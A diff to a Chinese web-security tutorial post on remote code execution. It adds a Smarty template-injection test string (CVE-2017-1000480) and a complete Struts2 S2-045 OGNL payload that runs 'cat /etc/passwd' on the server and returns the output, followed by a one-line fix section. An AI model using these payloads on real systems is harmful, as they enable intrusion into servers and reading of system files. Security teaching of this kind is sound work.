--- a/_posts/2018-03-22-web.md
+++ b/_posts/2018-03-22-web.md
@@ -35,6 +35,41 @@ description: "《Web安全测试学习手册》- 远程代码执行"
 
 ## 0x04 测试方案
 
-### 1）PHP中常见场景
+### PHP中常见场景 - 模板引擎代码执行
+
+Smarty简介
+
+> Smarty是一个PHP的模板引擎。更明确来说，它可以帮助开发者更好地 分离程序逻辑和页面显示。最好的例子，是当程序员和模板设计师是不同的两个角色的情况，而且 大部分时候都不是同一个人的情况。
+> 
+> CVE-ID : CVE-2017-1000480
 
 
+
+由于未对用户的输入点进行过滤，导致经过eval函数，造成代码执行
+
+测试Payload：
+
+
+```
+*/phpinfo();/*
+```
+
+
+
+![0x00](http://rvn0xsy.oss-cn-shanghai.aliyuncs.com/2018-04-16/0x00.png)
+
+### Java Struts2 （S2-045）
+
+由于未对用户输入点进行过滤，被带入ErrorMessage，当做OGLN表达式解析，造成代码执行
+
+测试Payload：
+
+```
+%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
+```
+
+![0x01](http://rvn0xsy.oss-cn-shanghai.aliyuncs.com/2018-04-16/0x01.png)
+
+## 0x05 修复方案
+
+升级插件、框架新版本
